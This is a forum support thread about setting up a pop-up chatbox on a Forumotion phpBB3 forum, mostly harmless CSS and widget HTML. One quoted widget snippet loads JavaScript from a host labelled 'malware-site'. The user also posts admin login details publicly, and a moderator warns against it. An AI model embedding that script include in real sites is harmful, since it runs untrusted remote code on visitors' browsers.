The forum of the forums

Would you like to react to this message? Create an account in a few clicks or log in to continue.
The forum of the forums
5 posters

    Chatbox popup problem

    Ivy_2819
    Ivy_2819
    Forumember


    Female Posts : 129
    Reputation : 3
    Language : Vietnamese and English
    Location : Houston, TX, USA

    Solved Chatbox popup problem

    Post by Ivy_2819 November 30th 2012, 12:49 am

    Hello,
    The last time I tried to install the FM-chat popup, it didn't comes out right.

    Chatbox popup problem Screen17

    I believe I have done correctly all the steps in this tutorial : https://help.forumotion.com/t88458-how-to-create-a-pop-up-chat-box-fmchat

    My chatbox and forum widget are activated.

    My forum link: www.steven.forumvi.com
    version: phpbb3


    Last edited by Ivy_2819 on December 1st 2012, 7:38 pm; edited 1 time in total
    Asriel
    Asriel
    Forumember


    Male Posts : 585
    Reputation : 32
    Language : English, Russian, Ukrainian
    Location : St. Somewhere

    Solved Re: Chatbox popup problem

    Post by Asriel November 30th 2012, 3:50 am

    Code:
        /*FMChat Design*/
        .chatbase { /*This can be edited to your liking - (the button)*/
          position: fixed;
          bottom: 2px;
          right: 15px;
          background: #56A0D3;
          border: 2px solid #7BB92B;
          width: 75px;
          height: 20px;
          border-radius: 5px;
          text-align: center !important;
          cursor: pointer;
          color: #ffffff;
        }

        .chatbase:hover { /*This can be edited to your liking - (hovering over the button)*/
          border-color: #D30C3F;
          color: #000000;
        }

        #chat { /*This can be edited to your liking - (box surrounding the chatbox)*/
          border: 2px solid #7BB92B;
          width: 65%;
          position: fixed;
          right: 15px;
          bottom: 27px;
          height: 50%;
          border-radius: 5px;
          z-index: 1000;
        }
    Ivy_2819
    Ivy_2819
    Forumember


    Female Posts : 129
    Reputation : 3
    Language : Vietnamese and English
    Location : Houston, TX, USA

    Solved Re: Chatbox popup problem

    Post by Ivy_2819 November 30th 2012, 5:24 am

    Rideem3 wrote:You didn't add the CSS.

    Asriel wrote:
    Code:
        /*FMChat Design*/
        .chatbase { /*This can be edited to your liking - (the button)*/
          position: fixed;
          bottom: 2px;
          right: 15px;
          background: #56A0D3;
          border: 2px solid #7BB92B;
          width: 75px;
          height: 20px;
          border-radius: 5px;
          text-align: center !important;
          cursor: pointer;
          color: #ffffff;
        }

        .chatbase:hover { /*This can be edited to your liking - (hovering over the button)*/
          border-color: #D30C3F;
          color: #000000;
        }

        #chat { /*This can be edited to your liking - (box surrounding the chatbox)*/
          border: 2px solid #7BB92B;
          width: 65%;
          position: fixed;
          right: 15px;
          bottom: 27px;
          height: 50%;
          border-radius: 5px;
          z-index: 1000;
        }

    No, I already add the CSS. But it still didn't work Sad
    Kaizer Lee
    Kaizer Lee
    Active Poster


    Female Posts : 1064
    Reputation : 54
    Language : English, Tagalog, Spanish and Chinese
    Location : Philippines

    Solved Re: Chatbox popup problem

    Post by Kaizer Lee November 30th 2012, 5:30 am

    Chatbox popup problem DEgmd

    Please dispatch of the following problems stated there first Smile
    Kaizer Lee
    Kaizer Lee
    Active Poster


    Female Posts : 1064
    Reputation : 54
    Language : English, Tagalog, Spanish and Chinese
    Location : Philippines

    Solved Re: Chatbox popup problem

    Post by Kaizer Lee November 30th 2012, 1:23 pm

    In case you've got no idea where the widget is located, I'll post it here:

    ACP < Modules < Forum Widgets Management < Create a New Widget (Make sure you enabled Widgets) < Save.
    Ivy_2819
    Ivy_2819
    Forumember


    Female Posts : 129
    Reputation : 3
    Language : Vietnamese and English
    Location : Houston, TX, USA

    Solved Re: Chatbox popup problem

    Post by Ivy_2819 November 30th 2012, 6:41 pm

    This is my Widget. The forum widget is activated , I already put it on the left side (180)
    Chatbox popup problem Screen19

    My code in the widget
    Code:
    <div id="FMChatBase" class="chatbase" onclick="openClose()"><span style="font-weight: bold; line-height: 2em; font-size: 11px;">ChatBox</span></div><div id="chat" style="display: none;"><iframe id="FMChat" name="FMChat" onload="FMChatLoad();" style="border: none; border-radius: 5px; -moz-border-radius: 5px; -webkit-border-radius: 5px;" src="/chatbox" height="100%" width="100%"></iframe></div>

    This is a part of CSS that contend the FMChat CSS code. I don't know much about scripts, codes,...Is there anything wrong with this ?
    Chatbox popup problem Screen20

    My CSS code:
    Code:
    /*FMChat Design*/
            .chatbase { /*This can be edited to your liking - (the button)*/
              position: fixed;
              bottom: 2px;
              right: 15px;
              background: #56A0D3;
              border: 2px solid #7BB92B;
              width: 75px;
              height: 20px;
              border-radius: 5px;
              text-align: center !important;
              cursor: pointer;
              color: #ffffff;
            }

            .chatbase:hover { /*This can be edited to your liking - (hovering over the button)*/
              border-color: #D30C3F;
              color: #000000;
            }

            #chat { /*This can be edited to your liking - (box surrounding the chatbox)*/
              border: 2px solid #7BB92B;
              width: 65%;
              position: fixed;
              right: 15px;
              bottom: 27px;
              height: 50%;
              border-radius: 5px;
              z-index: 999;
            }

    And this is my JS, I don't know If I have done anything wrong :/
    I didn't change the "normal"
    I leave the duration blank ""
    I changed the MOD sign in to "Chat MOD"
    I changed the title to "FMChat"
    I changed the tiltle URL in to "WWW.STEVEN.FORUMVI.COM/CHATBOX" (I think this was the problem)
    Chatbox popup problem Screen21

    My JS code:
    Code:
    /*FMChat Variables*/
        var fmchat_toggle = "normal"; //Toggle Type
        var fmchat_toggle_duration = ""; //Toggle Duration
        var fmchat_mod_sign = "CHAT MOD"; //FMChat Mod Sign
        var fmchat_title = "FMChat"; //FMChat Title
        var fmchat_title_url = "WWW.STEVEN.FORUMVI.COM/CHATBOX"; //FMChat Title URL

    I also set it as "In all pages"

    Could you find the problem please Sad
    Sanket
    Sanket
    ForumGuru


    Male Posts : 48766
    Reputation : 2830
    Language : English
    Location : Mumbai

    Solved Re: Chatbox popup problem

    Post by Sanket November 30th 2012, 6:47 pm

    Chatbox popup problem Screen19

    In the above image. First click on this Chatbox popup problem Desact-html. Then return to the original window & then add the code.
    See if that changes anything.
    Ivy_2819
    Ivy_2819
    Forumember


    Female Posts : 129
    Reputation : 3
    Language : Vietnamese and English
    Location : Houston, TX, USA

    Solved Re: Chatbox popup problem

    Post by Ivy_2819 November 30th 2012, 6:58 pm

    Sanket wrote:Chatbox popup problem Screen19

    In the above image. First click on this Chatbox popup problem Desact-html. Then return to the original window & then add the code.
    See if that changes anything.

    No, didn't change anything with forum widget activated :/

    Oh, and also, I've deactivated the forum widget since I still can't figure out what's the problem (activated it while having this problem making my forum look weird Confused ) , I'll activate it again if there's new solution.
    Sanket
    Sanket
    ForumGuru


    Male Posts : 48766
    Reputation : 2830
    Language : English
    Location : Mumbai

    Solved Re: Chatbox popup problem

    Post by Sanket November 30th 2012, 7:27 pm

    https://help.forumotion.com/t88458-how-to-create-a-pop-up-chat-box-fmchat#690155
    Thats the code in the widget, what code did you add in yours?
    Ivy_2819
    Ivy_2819
    Forumember


    Female Posts : 129
    Reputation : 3
    Language : Vietnamese and English
    Location : Houston, TX, USA

    Solved Re: Chatbox popup problem

    Post by Ivy_2819 November 30th 2012, 7:48 pm

    Ivy_2819 wrote:This is my Widget. The forum widget is activated , I already put it on the left side (180)
    Chatbox popup problem Screen19

    My code in the widget
    Code:
    <div id="FMChatBase" class="chatbase" onclick="openClose()"><span style="font-weight: bold; line-height: 2em; font-size: 11px;">ChatBox</span></div><div id="chat" style="display: none;"><iframe id="FMChat" name="FMChat" onload="FMChatLoad();" style="border: none; border-radius: 5px; -moz-border-radius: 5px; -webkit-border-radius: 5px;" src="/chatbox" height="100%" width="100%"></iframe></div>

    As I said above. At first I copied and pasted the code on the first post of this link https://help.forumotion.com/t88458-how-to-create-a-pop-up-chat-box-fmchat Which is :
    Code:
    <script type="text/javascript" src="http://forum.malware-site.www/14000.js"></script><div id="FMChatBase" class="chatbase" onclick="openClose(); autoLog();"><span style="font-weight: bold; line-height: 2em; font-size: 11px;">ChatBox</span></div><div id="chat" style="display: none;"><iframe id="FMChat" name="FMChat" onload="FMChatLoad();" style="border: none; border-radius: 5px; -moz-border-radius: 5px; -webkit-border-radius: 5px;" src="/chatbox" height="100%" width="100%"></iframe></div>
    And then when I scroll down, I saw the update of the Widget html code, I copied and pasted the latest update of the code, which is :

    Code:
    <script type="text/javascript" src="http://fmquery.forumotion.com/h1-fmchatjs"></script><div id="FMChatBase" class="chatbase" onclick="openClose()" ><span style="font-weight: bold; line-height: 2em; font-size: 11px;">ChatBox</span></div><div id="chat" style="display: none;"><iframe id="FMChat" name="FMChat" onload="FMChatLoad();" style="border: none; border-radius: 5px; -moz-border-radius: 5px; -webkit-border-radius: 5px;" src="/chatbox" width="100%" height="100%"></iframe></div>
    Sanket
    Sanket
    ForumGuru


    Male Posts : 48766
    Reputation : 2830
    Language : English
    Location : Mumbai

    Solved Re: Chatbox popup problem

    Post by Sanket November 30th 2012, 7:51 pm

    Can you provide me with a test admin account for that forum, wherever you are installing this?
    SLGray
    SLGray
    Administrator
    Administrator


    Male Posts : 51498
    Reputation : 3523
    Language : English
    Location : United States

    Solved Re: Chatbox popup problem

    Post by SLGray November 30th 2012, 7:53 pm

    All the information in the first post of the tutorial is up to date.



    Chatbox popup problem Slgray10

    When your topic has been solved, ensure you mark the topic solved.
    Never post your email in public.
    Ivy_2819
    Ivy_2819
    Forumember


    Female Posts : 129
    Reputation : 3
    Language : Vietnamese and English
    Location : Houston, TX, USA

    Solved Re: Chatbox popup problem

    Post by Ivy_2819 November 30th 2012, 8:04 pm

    Sanket wrote:Can you provide me with a test admin account for that forum, wherever you are installing this?

    Okay, but I don't have any email left to do that, could you provide me an email first?

    slg wrote:All the information in the first post of the tutorial is up to date.

    Oh, so it's all the same right? Thank you.
    Sanket
    Sanket
    ForumGuru


    Male Posts : 48766
    Reputation : 2830
    Language : English
    Location : Mumbai

    Solved Re: Chatbox popup problem

    Post by Sanket November 30th 2012, 8:08 pm

    Well i am sorry I don't want to register on the forum with my email address.

    You can create one or send me your account details with the password already changed. Once, i use it & am done with it. You can change it to your original password.
    Ivy_2819
    Ivy_2819
    Forumember


    Female Posts : 129
    Reputation : 3
    Language : Vietnamese and English
    Location : Houston, TX, USA

    Solved Re: Chatbox popup problem

    Post by Ivy_2819 November 30th 2012, 9:24 pm

    Sanket wrote:Well i am sorry I don't want to register on the forum with my email address.

    You can create one or send me your account details with the password already changed. Once, i use it & am done with it. You can change it to your original password.

    Here you go,
    ID: Xiao dong
    password: Password Removed
    link: www.steven.forumvi.com
    Admin Panel: http://steven.forumvi.com/admin/index.forum?tid=#Removed

    hope you can find the solution Smile Thank you

    Sanket
    Sanket
    ForumGuru


    Male Posts : 48766
    Reputation : 2830
    Language : English
    Location : Mumbai

    Solved Re: Chatbox popup problem

    Post by Sanket December 1st 2012, 2:39 pm

    Ivy_2819 wrote:
    Here you go,
    ID: Xiao dong
    password: Password Removed
    link: www.steven.forumvi.com
    Admin Panel: http://steven.forumvi.com/admin/index.forum?tid=#Removed

    hope you can find the solution Smile Thank you


    Firstly, never ever post a password to any account on a public forum. Its not safe. You posted a admin account password, any person here could have misused it. So please don't do this in the future for your & your forum's safety.
    You should have PM'ed me these details.


    I went to your forum, there seems to be nothing installed in the forum widgets management. Please install everything according to the tutorial, I will only come & check what could be wrong. I am not installing it from scratch.
    Ivy_2819
    Ivy_2819
    Forumember


    Female Posts : 129
    Reputation : 3
    Language : Vietnamese and English
    Location : Houston, TX, USA

    Solved Re: Chatbox popup problem

    Post by Ivy_2819 December 1st 2012, 7:35 pm

    I already mark the topic as complete, cause I don't need the popup anymore, it's too complicated, me and some other admins decided to leave the chatbox this way Smile Thank you and also sorry for bothering you guys these days
    SLGray
    SLGray
    Administrator
    Administrator


    Male Posts : 51498
    Reputation : 3523
    Language : English
    Location : United States

    Solved Re: Chatbox popup problem

    Post by SLGray December 1st 2012, 7:43 pm

    It is ok.
    Topic Solved & Locked



    Chatbox popup problem Slgray10

    When your topic has been solved, ensure you mark the topic solved.
    Never post your email in public.

      Current date/time is September 22nd 2024, 9:13 pm